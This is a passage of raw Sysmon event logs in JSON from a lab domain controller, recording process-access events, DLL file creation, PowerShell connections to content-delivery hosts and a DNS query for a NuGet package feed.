05:52:16.326","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4458,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.326\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.326","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4459,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.326\r\nSourceProcessGUID: {A837DB8D-030D-5F25-0000-00106C530600}\r\nSourceProcessId: 4344\r\nSourceThreadId: 644\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0310-5F25-0000-0010929F0600}\r\nTargetProcessId: 5076\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.326","SourceProcessGUID":"{A837DB8D-030D-5F25-0000-00106C530600}","SourceProcessId":"4344","SourceThreadId":"644","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0310-5F25-0000-0010929F0600}","TargetProcessId":"5076","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4460,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:16.342\r\nProcessGuid: {A837DB8D-0310-5F25-0000-0010879B0600}\r\nProcessId: 5108\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\2p1lmb1q\\2p1lmb1q.dll\r\nCreationUtcTime: 2020-08-01 05:52:16.217","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:16.342","ProcessGuid":"{A837DB8D-0310-5F25-0000-0010879B0600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\2p1lmb1q\\2p1lmb1q.dll","CreationUtcTime":"2020-08-01 05:52:16.217","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4461,"ProcessID":2740,"ThreadID":3416,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.934\r\nProcessGuid: {A837DB8D-030F-5F25-0000-0010637A0600}\r\nProcessId: 3112\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-881393.attackrange.local\r\nSourcePort: 54934\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 184.84.68.43\r\nDestinationHostname: a184-84-68-43.deploy.static.akamaitechnologies.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.934","ProcessGuid":"{A837DB8D-030F-5F25-0000-0010637A0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-881393.attackrange.local","SourcePort":"54934","DestinationIsIpv6":"false","DestinationIp":"184.84.68.43","DestinationHostname":"a184-84-68-43.deploy.static.akamaitechnologies.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4462,"ProcessID":2740,"ThreadID":3416,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.030\r\nProcessGuid: {A837DB8D-030F-5F25-0000-0010637A0600}\r\nProcessId: 3112\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-881393.attackrange.local\r\nSourcePort: 54935\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 72.21.81.200\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.030","ProcessGuid":"{A837DB8D-030F-5F25-0000-0010637A0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-881393.attackrange.local","SourcePort":"54935","DestinationIsIpv6":"false","DestinationIp":"72.21.81.200","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4463,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:17.827\r\nProcessGuid: {A837DB8D-030F-5F25-0000-0010637A0600}\r\nProcessId: 3112\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Program Files\\PackageManagement\\ProviderAssemblies\\nuget\\2.8.5.208\\Microsoft.PackageManagement.NuGetProvider.dll\r\nCreationUtcTime: 2020-08-01 05:52:17.827","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:17.827","ProcessGuid":"{A837DB8D-030F-5F25-0000-0010637A0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Program Files\\PackageManagement\\ProviderAssemblies\\nuget\\2.8.5.208\\Microsoft.PackageManagement.NuGetProvider.dll","CreationUtcTime":"2020-08-01 05:52:17.827","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4464,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.020\r\nProcessGuid: {A837DB8D-030F-5F25-0000-0010637A0600}\r\nProcessId: 3112\r\nQueryName: onegetcdn.azureedge.net\r\nQueryStatus: 0\r\nQueryResults: type:  5 onegetcdn.ec.azureedge.net;type:  5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.020","ProcessGuid":"{A837DB8D-030F-5F25-0000-0010637A0600}","QueryName":"onegetcdn.azureedge.net","QueryStatus":"0","QueryResults":"type:  5 onegetcdn.ec.azureedge.net;type:  5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4465,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.264\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.264","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4466,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.264\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.264","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4467,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.264\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.264","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4468,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.280\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 